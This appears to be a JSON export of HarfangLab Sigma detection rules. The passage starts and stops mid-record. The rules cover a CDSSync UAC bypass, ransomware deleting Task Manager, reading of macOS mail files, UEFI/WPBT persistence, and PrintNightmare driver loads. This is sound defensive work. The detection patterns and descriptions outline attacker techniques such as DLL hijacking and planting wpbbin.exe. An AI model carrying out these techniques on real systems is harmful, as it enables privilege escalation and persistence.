"rule_description": "Detects the preparation of the CDSSync scheduled task UAC bypass.\nAttackers can manipulate the Windows environment variables registry key to redirect the normal execution flow of the CDSSync scheduled task to load a malicious DLL.\nWhen the CDSSync scheduled task is run, taskhostw.exe will try to load npmproxy.dll from the %windir%\\\\System32 folder.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the DLL file creation as well as to investigate the DLL file itself to determine its legitimacy.\n",
"rule_creation_date": "2020-11-27",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f589e603-b094-4be7-a1be-4500e4d6e42a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085624Z",
"creation_date": "2026-03-23T11:45:34.085626Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085630Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/blackbyte-ransomware/",
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_taskmgr_deletion.yml",
"content": "title: Task Manager Binary Deleted\nid: f589e603-b094-4be7-a1be-4500e4d6e42a\ndescription: |\n Detects the suspicious removal of the task manager binary (taskmgr.exe).\n Before encrypting a system, ransomwares may remove tools that could enable users to kill the running ransomware.\n This behavior is, as of March 2024, used by main payload of the Blackbyte ransomware group.\n It is recommended to analyze the process that deleted taskmgr.exe and look for ransomware-related activities.\nreferences:\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1490/\ndate: 2024/03/14\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1490\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: filesystem_remove\n product: windows\ndetection:\n selection:\n Path:\n - '?:\\Windows\\System32\\Taskmgr.exe'\n - '?:\\Windows\\SysWoW64\\Taskmgr.exe'\n ProcessParentImage|contains: '?'\n\n exclusion_update:\n Image: '?:\\Windows\\System32\\poqexec.exe'\n\n exclusion_tiworker:\n Image: '?:\\Windows\\WinSxS\\\\*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f589e603-b094-4be7-a1be-4500e4d6e42a",
"rule_name": "Task Manager Binary Deleted",
"rule_description": "Detects the suspicious removal of the task manager binary (taskmgr.exe).\nBefore encrypting a system, ransomwares may remove tools that could enable users to kill the running ransomware.\nThis behavior is, as of March 2024, used by main payload of the Blackbyte ransomware group.\nIt is recommended to analyze the process that deleted taskmgr.exe and look for ransomware-related activities.\n",
"rule_creation_date": "2024-03-14",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f59595f0-0de1-496d-b2d1-effe504cb815",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618469Z",
"creation_date": "2026-03-23T11:45:34.618471Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618475Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/",
"https://attack.mitre.org/techniques/T1114/001/"
],
"name": "t1114_001_read_mail.yml",
"content": "title: Suspicious Read Access to Mail Files\nid: f59595f0-0de1-496d-b2d1-effe504cb815\ndescription: |\n Detects a process reading sensitive files related to the Mail application.\n Adversaries may target the user's mail on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\n - https://attack.mitre.org/techniques/T1114/001/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1114.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n # /Users//Library/Mail/V10/MailData/Envelope Index\n Path|startswith: '/Users/*/Library/Mail/*/MailData/Envelope Index'\n ProcessImage|contains: '?'\n\n filter_mail:\n Image:\n - '/System/Library/PrivateFrameworks/EmailDaemon.framework/Versions/A/maild'\n - '/System/Applications/Mail.app/*'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_backup:\n Image:\n - '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n - '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_mailbutler:\n Image: '/Users/*/Library/Application Support/com.mailbutler.agent/Mailbutler.app/Contents/MacOS/Mailbutler Agent'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_norton:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.norton.mes.endpointsecurity'\n\n exclusion_kaspersky:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.kaspersky.kav.kavd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'com.macpaw.CleanMyMac*'\n - 'com.macpaw.cmm-business'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f59595f0-0de1-496d-b2d1-effe504cb815",
"rule_name": "Suspicious Read Access to Mail Files",
"rule_description": "Detects a process reading sensitive files related to the Mail application.\nAdversaries may target the user's mail on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1114.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f59b1f82-7a09-4afd-a2f8-492bf5e994d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076251Z",
"creation_date": "2026-03-23T11:45:34.076253Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076257Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wpbbin.html",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_registry_change_allowing_uefi_persistance.yml",
"content": "title: Registry Configuration Allowing UEFI Persistence Changed\nid: f59b1f82-7a09-4afd-a2f8-492bf5e994d7\ndescription: |\n Detects a dangerous modification or a deletion of the DisableWpbtExecution key in the registry.\n When DisableWpbtExecution is 0 or deleted, it allows the execution of wpbbin.exe, a file placed by the BIOS in System32 and executed by smss.exe during OS startup.\n Attackers can use this feature as a persistence mechanism by putting a malicious wpbbin.exe that will be executed at the next startup.\n It is recommended to investigate the execution context of the detected process, other surrounding detections, as well as the file telemetry looking for a written file at \"C:\\Windows\\system32\\wpbbin.exe\" to determine if this action was legitimate.\nreferences:\n - https://persistence-info.github.io/Data/wpbbin.html\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2022/07/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1542.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_target:\n TargetObject|contains: 'HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\DisableWpbtExecution'\n\n selection_value_set:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n\n selection_value_delete:\n EventType: 'DeleteValue'\n\n condition: selection_target and 1 of selection_value_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f59b1f82-7a09-4afd-a2f8-492bf5e994d7",
"rule_name": "Registry Configuration Allowing UEFI Persistence Changed",
"rule_description": "Detects a dangerous modification or a deletion of the DisableWpbtExecution key in the registry.\nWhen DisableWpbtExecution is 0 or deleted, it allows the execution of wpbbin.exe, a file placed by the BIOS in System32 and executed by smss.exe during OS startup.\nAttackers can use this feature as a persistence mechanism by putting a malicious wpbbin.exe that will be executed at the next startup.\nIt is recommended to investigate the execution context of the detected process, other surrounding detections, as well as the file telemetry looking for a written file at \"C:\\Windows\\system32\\wpbbin.exe\" to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f5a0d71f-1a1b-430d-bdc6-2c661c63b6f9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607039Z",
"creation_date": "2026-03-23T11:45:34.607043Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607051Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://attack.mitre.org/techniques/T1574/"
],
"name": "t1574_spoolsv_unsigned_provider_load.yml",
"content": "title: Spoolsv Unsigned Print Provider Added\nid: f5a0d71f-1a1b-430d-bdc6-2c661c63b6f9\ndescription: |\n Detects spoolsv loading an unsigned print provider, potentially indicating CVE-2021-1675 exploitation.\n Spoofsv is the print spooler service, and loading unsigned print providers can be used by attackers to exploit vulnerabilities.\n It is recommended to restart the print spooler service, review print provider installations, and check for any signs of unauthorized code execution or file modifications associated with this activity.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1574/\ndate: 2021/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - cve.2021-1675\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\spoolsv.exe'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\\\?\\\\*'\n\n exclusion_signed:\n Signed: 'true'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\cnp6040c_D8F87.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Cnp60fr-FR_D69BE.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CnAdEPUIFR.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Cnp60MUI_D69BE.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CNXPTN32.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CPC1FR.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CNXDIAS2.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CPC10E.DLL\n exclusion_canon_drivers:\n # Canon drivers are always at the root of the directory.\n ImageLoaded:\n # Standard drivers start with the \"cn\" prefix.\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cn*.DLL'\n # Canon PageComposer drivers always start with the \"cpc\" prefix.\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cpc*.DLL'\n # Canon Driver Information Assist Service always start with the \"cnxdias\" prefix.\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cnxdias*.DLL'\n # Canon Message Resource driver (original version from 2002)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CNXP*.DLL' # (CNXP0LOG.DLL)\n # Canon NetSpot Suite\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\AUSSDRV.DLL'\n Company: 'CANON INC.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\UCS32P.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\CNKYNS32.DLL\n # Very specific Canon tooling from 1997~2005 (probably not directly done by Canon)\n exclusion_canon_colorgear:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\UCS32P.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CN*.DLL' # (CNKYNS32.DLL, CNKYNS32.DLL, CNWFCGCO.DLL)\n Company: 'Canon'\n Product:\n - 'ColorGear'\n - 'ColorGear C'\n - 'ColorGear dll (x64)'\n - '* DM plug-in DLL' # (RGBPrinter DM plug-in DLL, RGBVirtual DM plug-in DLL)\n - '* GMA plug-in DLL' # (MonitorMatch GMA plug-in DLL, Saturation GMA plug-in DLL, Colorimetric GMA plug-in DLL)\n exclusion_canon_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\CNXP*.DLL' # (CNXPHS32.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Xerox\\Language Data\\V5.0\\en-us\\x3txt4S.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Xerox\\Language Data\\V5.0\\fr\\x3txt4S.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Xerox\\Language Data\\V5.0\\fr\\x3txt7E.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnzim.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnkdm.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnziv.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnz.xrs\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\fxxmnzir.xrs\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\x5lrs.dll\n exclusion_xerox:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??-??\\x?txt???.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??-??\\x?txt??.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??\\x?txt???.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\Xerox\\Language Data\\V?.?\\\\??\\x?txt??.dll' # (x3txt01X.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnzim.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnziv.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnkdm.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxxmnzir.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\fxt*.dll' # (fxthm3axpui.dll, fxt6p4axpUI.DLL, fxt6n1axpUI.DLL,fxt6n1aIPS.DLL, fxt6p4aIPS.DLL, fxthm3aips.dll, fxt6p4aRC.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x5lrs.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x5lrsl.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrpscfhu.dll'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrhwsz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrh*.dll' # (xrhwsjdm.dll, xrhwsziu.dll, xrhk2axp.dll, xrhr3aIPS.DLL, xrhr3axpUI.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrhws???.xrs' # (xrhwszir.xr)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrzd????.dll' # (xrzdhb32.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrhz????.dll' # (xrhzdczd.dll, xrhzdcis.dll)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x2*.dll' # (x2ptpcSJ.dll, x2coreSJ.dll, x2guiSJ.dll, x2upSJ.dll, x2rnutSJ.dll, x2ptpcRB.dll, x2guiRB.dll, x2utilQ5.dl, x2upQ5.dll, x2comsQ5.dll, ... )\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\x3*.dll' # (x3wfuv8K.dll, x3core8K.dll, x3util8K.dll, x3coms8K.dll, x3up8K.dll, x3fput3C.dll, x3encr3C.dll, x3ptpc3C.dll, x3util3C.dll, x3gui3C.dll, x3core7E.dll, x3rnut7E.dll, x3rnut3X.dll, x3coms00N.dll, x3util00N.dll, x3up00N.dll, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FULGM13A_*.DLL' # (FULGM13A_en-GB.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FX6??ALU-?.DLL' # (FX6BEALU-1.dll, FX6MBALU-1.DLL, FX6SOALU-4.DLL, FX6MHALU-2.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FXP??ALU-?.DLL' # (FXP2SALU-4.DLL)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrx?????.dll' # (xrxmpzim.dll, xrxmokdm.dll, xrxmnzim.dll, xrxkrziu.dll, xrxmozis.dll, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrx?????.xrs' # (xrxmozir.xrs, xrxkrzir.xrs, ... )\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\xrxkrz.xrs'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\FUUIM???.DLL' # (FUUIM13A.DLL)\n Company:\n - 'Xerox'\n - 'Xerox Corporation'\n - 'Fuji Xerox Co., Ltd.'\n - 'Fuji Xerox Co.,Ltd.'\n - 'Xerox Co., Ltd.'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYTJ_F.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_C.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_D.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYTJ_U.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_C.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_F.DLL\n # C:\\Windows\\System32\\spool\\drivers\\w32x86\\3\\KOAYXJ_X.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_T.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_U.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOB__J_G.DLL\n exclusion_konica_minolta:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO????_?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KOBDrvAPIW64.exe'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KB??????.DLL' # (KBDLMA8A.DLL, KBLGMA8A.DLL, ...)\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO??????.DLL' # (KOAZ8JAR.DLL, KOFXPA1C.DLL, ...)\n Company:\n - 'KONICA MINOLTA, INC.'\n - 'KONICA MINOLTA BUSINESS TECHNOLOGIES, INC.'\n OriginalFileName:\n - 'KOAYTJ_?.dll'\n - 'KO????_?'\n - 'KO????_?.dll'\n - 'KMWOW64.exe'\n - 'KB??????.DLL'\n - 'KO??????.DLL'\n - 'KO??????'\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYTJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\w32x86\\3\\KOAYXJ_B.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYQJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOBJUJ_O.DLL\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\KOAYXJ_N.DLL\n exclusion_konica_minolta_no_company_name:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO????_?.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\KO??????.DLL' # (KOAYTJAO.DLL)\n OriginalFileName:\n - 'OAPIDrvLib*.dll' # (OAPIDrvLib42.dll, OAPIDrvLib521.dll, OAPIDrvLib5211.dll, OAPIDrvLib50.dll)\n - 'kmbd??.dll'\n - 'kmbdprtntfy13_own.DLL'\n - 'kmbdprtntfy13_own_x64.DLL'\n - 'xerces-c_?_?.dll'\n - 'KO????_?.dll'\n InternalName:\n - 'OAPIDrvLib*.dll'\n - 'kmbd'\n - 'kmbdprtntfy13_own'\n - 'kmbdprtntfy13_own_x64'\n - 'xerces-c_?_?.dll'\n - 'KO????_?'\n exclusion_konica_minolta_without_infos:\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\KO????_?.DLL' # (KOAYQJ_W.DLL)\n Company: ''\n Description: ''\n OriginalFileName: ''\n InternalName: ''\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdfui251.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdfui500.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdf251.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdf300.dll\n # C:\\Windows\\System32\\spool\\drivers\\x64\\3\\acpdf500.dll\n exclusion_amyuni:\n ImageLoaded:\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\acpdfui???.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\acpdf???.DLL'\n - '?:\\Windows\\System32\\spool\\drivers\\\\*\\3\\cdintf*.dll' # (cdintf450_64.dll)\n OriginalFileName:\n - 'ACFPDFUI.DLL'\n - 'ACFPDF.DLL'\n - 'CDINTF.DLL'\n InternalName:\n - 'ACFPDFUI.DLL'\n - 